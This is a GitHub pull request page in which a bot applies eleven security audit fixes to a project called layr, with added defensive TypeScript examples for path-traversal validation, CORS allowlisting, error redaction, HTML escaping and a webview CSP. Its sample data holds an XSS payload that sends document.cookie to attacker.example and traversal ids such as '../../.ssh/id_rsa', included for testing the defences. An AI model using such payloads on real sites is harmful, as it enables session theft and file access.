
fix: apply 11 Shipwell audit findings #58

Open

shipwellhq[bot] wants to merge 1 commit into main from shipwell/fix-audit-1771234157948

Conversation

shipwellhq[bot] commented Feb 16, 2026

🛠️ Shipwell Auto-Fix: audit

Automated fixes generated by Shipwell analysis.

✅ Applied Fixes (11)

| Severity | Finding | Files |
| --- | --- | --- |
| ⚪ info | XSS via Template Injection in Template Browser Webview | src/templates/templateBrowser.ts, src/templates/templateManager.ts, src/version-control/HistoryView.ts |
| ⚪ info | Wildcard CORS on API Proxy Allows Abuse from Any Origin | api-proxy/vercel.json, api-proxy/api/chat.js, src/planner/providers/groq.ts |
| ⚪ info | Information Disclosure: Internal Error Details Leaked to Client in API Proxy | api-proxy/api/chat.js |
| ⚪ info | Path Traversal in VersionManager.getVersion and deleteVersion | src/version-control/VersionManager.ts, src/version-control/HistoryView.ts, src/version-control/diffProvider.ts |
| ⚪ info | Sensitive Environment Variable Loading with Debug Logging of API Key Presence | src/extension.ts, src/planner/index.ts, src/utils/logger.ts |
| ⚪ info | Unvalidated User Input in AI Prompts Enables Prompt Injection | src/planner/providers/groq.ts, src/planner/providers/gemini.ts, src/planner/providers/ollama.ts |
| ⚪ info | HTML Export Vulnerable to Stored XSS via Markdown Content | src/extension.ts |
| ⚪ info | Gemini Safety Settings Disabled (BLOCK_NONE for All Harm Categories) | src/planner/ai.ts, src/planner/providers/gemini.ts |
| ⚪ info | SSRF Risk via Configurable Ollama Base URL | src/planner/providers/ollama.ts, src/planner/providers/factory.ts |
| ⚪ info | Template ID Generation Allows File System Manipulation | src/templates/templateManager.ts |
| ⚪ info | Proxy URL Configurable via Environment Variable Without Validation | src/planner/providers/groq.ts |

Finding details

⚪ XSS via Template Injection in Template Browser Webview

Category: security
Files: src/templates/templateBrowser.ts, src/templates/templateManager.ts, src/version-control/HistoryView.ts

⚪ Wildcard CORS on API Proxy Allows Abuse from Any Origin

Category: security
Files: api-proxy/vercel.json, api-proxy/api/chat.js, src/planner/providers/groq.ts

⚪ Information Disclosure: Internal Error Details Leaked to Client in API Proxy

Category: security
Files: api-proxy/api/chat.js

⚪ Path Traversal in VersionManager.getVersion and deleteVersion

Category: security
Files: src/version-control/VersionManager.ts, src/version-control/HistoryView.ts, src/version-control/diffProvider.ts

⚪ Sensitive Environment Variable Loading with Debug Logging of API Key Presence

Category: security
Files: src/extension.ts, src/planner/index.ts, src/utils/logger.ts

⚪ Unvalidated User Input in AI Prompts Enables Prompt Injection

Category: security
Files: src/planner/providers/groq.ts, src/planner/providers/gemini.ts, src/planner/providers/ollama.ts

⚪ HTML Export Vulnerable to Stored XSS via Markdown Content

Category: security
Files: src/extension.ts

⚪ Gemini Safety Settings Disabled (BLOCK_NONE for All Harm Categories)

Category: security
Files: src/planner/ai.ts, src/planner/providers/gemini.ts

⚪ SSRF Risk via Configurable Ollama Base URL

Category: security
Files: src/planner/providers/ollama.ts, src/planner/providers/factory.ts

⚪ Template ID Generation Allows File System Manipulation

Category: security
Files: src/templates/templateManager.ts

⚪ Proxy URL Configurable via Environment Variable Without Validation

Category: security
Files: src/planner/providers/groq.ts

❌ Failed (1)

  • ⚪ Webview Content Security Policy Missing — Could not match hunk at line 97 in src/templates/templateBrowser.ts

Generated by Shipwell 🚢
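
Added example, not code from this PR or from the layr repository: the findings on VersionManager.getVersion/deleteVersion and on template id generation are the same class of bug, a user-controlled identifier joined onto a storage directory. The check a reviewer would look for in the fix is shown below in TypeScript: an id grammar that can never contain a path separator or a leading dot, a slug function for ids derived from user-supplied template names, and a containment check on the resolved absolute path as a second, independent layer. Every name here (ID_PATTERN, toTemplateId, resolveInside, the /tmp/layr-versions directory, the sample ids) is an assumption for the example and not an identifier from the project.

```typescript
import * as path from "path";

// Hypothetical identifier grammar for version and template ids: must start
// with a letter, digit, "_" or "-" (so ".", ".." and dot-files are rejected up
// front), then up to 63 more of those characters or ".". "/" and "\" never match.
const ID_PATTERN = /^[A-Za-z0-9_-][A-Za-z0-9._-]{0,63}$/;

function isSafeId(id: string): boolean {
  return ID_PATTERN.test(id);
}

/**
 * Derive a storage id from a user-supplied template name. Everything outside
 * [a-z0-9] collapses to a single "-", so "../../etc/passwd" becomes
 * "etc-passwd" rather than a relative path. Falls back to a time-based id
 * when nothing usable is left (e.g. a name made only of punctuation).
 */
function toTemplateId(name: string): string {
  const slug = name
    .toLowerCase()
    .replace(/[^a-z0-9]+/g, "-")
    .slice(0, 64)
    .replace(/^-+|-+$/g, "");
  return slug.length > 0 ? slug : `template-${Date.now().toString(36)}`;
}

/**
 * Resolve `id` to a file under `baseDir`, or return null. Two independent
 * layers: the id grammar above, then a containment check on the resolved
 * absolute path, so a bug in one does not become a traversal through the other.
 */
function resolveInside(baseDir: string, id: string, ext = ".json"): string | null {
  if (!isSafeId(id)) return null;
  const root = path.resolve(baseDir);
  const target = path.resolve(root, id + ext);
  // path.relative yields "" for root itself and a ".."-prefixed path when the
  // target lies outside root (or an absolute path on Windows across drives).
  const rel = path.relative(root, target);
  if (rel === "" || rel.startsWith("..") || path.isAbsolute(rel)) return null;
  return target;
}

// Constructed sample inputs, as ids might arrive in a webview message to
// getVersion/deleteVersion; not data from the project.
const SAMPLE_IDS = ["v1", "2026-02-16T09-29", "../../.ssh/id_rsa", "..", "v1/../../x", ".hidden"];

function demo(): Record<string, string | null> {
  const out: Record<string, string | null> = {};
  for (const id of SAMPLE_IDS) out[id] = resolveInside("/tmp/layr-versions", id);
  return out;
}

console.log(demo());
```

The grammar check does the real work; the containment check is there so that a later change to the grammar (say, allowing "/" for nested templates) cannot silently reopen the traversal. Apply the same resolver to delete as to read: a delete that takes an unvalidated id is the more damaging of the two.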

shipwellhq[bot] requested a review from manasdutta04 as a code owner, February 16, 2026 09:29
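
Added example, not code from this PR or from api-proxy/api/chat.js: the wildcard-CORS and error-disclosure findings both sit in the proxy handler, so one hardened handler shape covers both. The TypeScript below contrasts the weak setting (Access-Control-Allow-Origin: *) with an origin allowlist that echoes only a matching Origin and sets Vary: Origin, and maps upstream failures to a generic message plus a request id while the full error goes to the server log. The Vercel function's req/res are stubbed as plain objects; ALLOWED_ORIGINS, handleChat, clientSafeError and the sample origin are assumptions for the example, not values from the project.

```typescript
import { randomUUID } from "crypto";

type HeaderMap = Record<string, string>;

// Hypothetical allowlist; in a deployment this would come from an environment
// variable or vercel.json, never "*". Exact string match, scheme included.
const ALLOWED_ORIGINS: ReadonlySet<string> = new Set(["https://layr.example.com"]);

/**
 * Weak setting: Access-Control-Allow-Origin: * lets any web page drive the
 * proxy (and the provider key it holds) from a visitor's browser.
 * Corrected: echo the request Origin only when it is on the allowlist, and
 * send Vary: Origin so a shared cache cannot hand one origin's response to another.
 */
function corsHeadersFor(origin: string | undefined, allowlist: ReadonlySet<string>): HeaderMap {
  if (origin === undefined || !allowlist.has(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Vary": "Origin",
    "Access-Control-Allow-Methods": "POST, OPTIONS",
    "Access-Control-Allow-Headers": "Content-Type",
    "Access-Control-Max-Age": "600",
  };
}

interface SafeError { status: number; body: { error: string; requestId: string } }

/**
 * Map an upstream failure to a response that carries no internal detail.
 * The full error (stack, upstream body, which may echo the key or the prompt)
 * goes to the server log under requestId; the client gets a generic message
 * plus that id so a support request can be correlated with the log line.
 */
function clientSafeError(err: unknown, requestId: string, log: (msg: string) => void = console.error): SafeError {
  log(`[${requestId}] upstream failure: ${err instanceof Error ? err.stack ?? err.message : String(err)}`);
  const status = typeof err === "object" && err !== null ? (err as { status?: unknown }).status : undefined;
  // Only a rate limit is worth telling the client about; everything else is 502.
  const rateLimited = status === 429;
  return {
    status: rateLimited ? 429 : 502,
    body: { error: rateLimited ? "Rate limited, retry later" : "Upstream request failed", requestId },
  };
}

interface ProxyRequest { method: string; headers: Record<string, string | undefined>; body?: unknown }
interface ProxyResponse { status: number; headers: HeaderMap; body: unknown }
type Upstream = (body: unknown) => Promise<unknown>;

/** Minimal chat-proxy handler; `upstream` stands in for the call to the model provider. */
async function handleChat(req: ProxyRequest, upstream: Upstream, allowlist: ReadonlySet<string> = ALLOWED_ORIGINS): Promise<ProxyResponse> {
  const origin = req.headers["origin"];
  const cors = corsHeadersFor(origin, allowlist);
  // A browser always sends Origin; refusing unknown ones here saves the upstream
  // call (the browser would drop the response anyway, but the quota would be spent).
  if (origin !== undefined && Object.keys(cors).length === 0) {
    return { status: 403, headers: {}, body: { error: "Origin not allowed" } };
  }
  if (req.method === "OPTIONS") return { status: 204, headers: cors, body: null };
  if (req.method !== "POST") return { status: 405, headers: cors, body: { error: "Method not allowed" } };
  const requestId = randomUUID();
  try {
    return { status: 200, headers: cors, body: await upstream(req.body) };
  } catch (err) {
    const safe = clientSafeError(err, requestId);
    return { status: safe.status, headers: cors, body: safe.body };
  }
}

// Constructed preflight from the allowed origin, for a stand-alone run.
handleChat({ method: "OPTIONS", headers: { origin: "https://layr.example.com" } }, async () => ({ ok: true }))
  .then((res) => console.log(res.status, res.headers));
```

An Origin allowlist is not authentication: a script or curl can send any Origin header it likes, so the proxy still needs its own rate limiting or a client credential to keep the key behind it from being used as a free endpoint. The allowlist only stops other web sites from riding a visitor's browser.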
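
Added example, not code from this PR or from src/templates/templateBrowser.ts: the template-browser XSS finding and the Content Security Policy fix that failed to apply belong together, since escaping untrusted strings stops the injection and the CSP makes sure that anything which does slip through still cannot run. The TypeScript below escapes template metadata before it is interpolated into the webview HTML and emits the nonce-based CSP that the VS Code webview documentation recommends. `webview.cspSource` is a real property of the VS Code Webview API; the function names, the TemplateSummary shape and the sample templates (one of which carries a constructed payload) are assumptions for the example. The HTML export finding on markdown content is a different case: rendered markdown must keep its markup, so the rendered output needs an allowlist sanitizer rather than this escaping, which is not shown here.

```typescript
import { randomBytes } from "crypto";

const HTML_ESCAPES: Record<string, string> = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

/** Escape the five HTML-significant characters so untrusted text is inert in element content and quoted attributes. */
function escapeHtml(s: string): string {
  return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c] ?? c);
}

/** Per-render nonce; only <script> tags carrying it may execute under the CSP below. */
function getNonce(): string {
  return randomBytes(16).toString("base64");
}

interface TemplateSummary { id: string; name: string; description: string }

/**
 * Build the template browser HTML. `cspSource` would be `webview.cspSource`
 * in a real extension (assumed here). default-src 'none' plus a nonce-only
 * script-src forbids inline handlers, javascript: URLs and any script that
 * does not carry this render's nonce.
 */
function buildTemplateBrowserHtml(templates: TemplateSummary[], cspSource: string, nonce: string = getNonce()): string {
  const csp = [
    "default-src 'none'",
    `style-src ${cspSource}`,
    `img-src ${cspSource}`,
    `script-src 'nonce-${nonce}'`,
  ].join("; ");
  const items = templates
    .map((t) => `<li data-id="${escapeHtml(t.id)}"><strong>${escapeHtml(t.name)}</strong> ${escapeHtml(t.description)}</li>`)
    .join("\n");
  return `<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Security-Policy" content="${csp}">
<title>Templates</title>
</head>
<body>
<ul id="templates">
${items}
</ul>
<script nonce="${nonce}">
  const vscode = acquireVsCodeApi();
  document.getElementById("templates").addEventListener("click", (e) => {
    const li = e.target.closest("li[data-id]");
    if (li) vscode.postMessage({ command: "select", id: li.dataset.id });
  });
</script>
</body>
</html>`;
}

// Constructed sample: a template name carrying an XSS payload, as it might
// arrive in a shared template file; not data from the project.
const SAMPLE_TEMPLATES: TemplateSummary[] = [
  { id: "blog-post", name: "Blog post", description: "Outline with intro and three sections" },
  { id: "evil", name: '<img src=x onerror="fetch(\'https://attacker.example/?k=\'+document.cookie)">', description: "looks harmless" },
];

console.log(buildTemplateBrowserHtml(SAMPLE_TEMPLATES, "vscode-webview-resource:"));
```

The nonce must be fresh per render and never reused across webviews; a static nonce is equivalent to 'unsafe-inline'. Interpolating escaped values into quoted attributes only is deliberate: an unquoted attribute would still let a space-separated payload break out even after escaping.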
vercel[bot] commented Feb 16, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

| Project | Deployment | Actions | Updated (UTC) |
| --- | --- | --- | --- |
| layr | Ready | Preview, Comment | Feb 16, 2026 9:29am |

github-actions[bot] commented

Hi @ShipwellHQ[bot]! 👋

Thanks for contributing to layr! 🎉
We appreciate your effort and will review your changes soon.


Please star the repo if you like it!
👤 Follow the owner for updates.
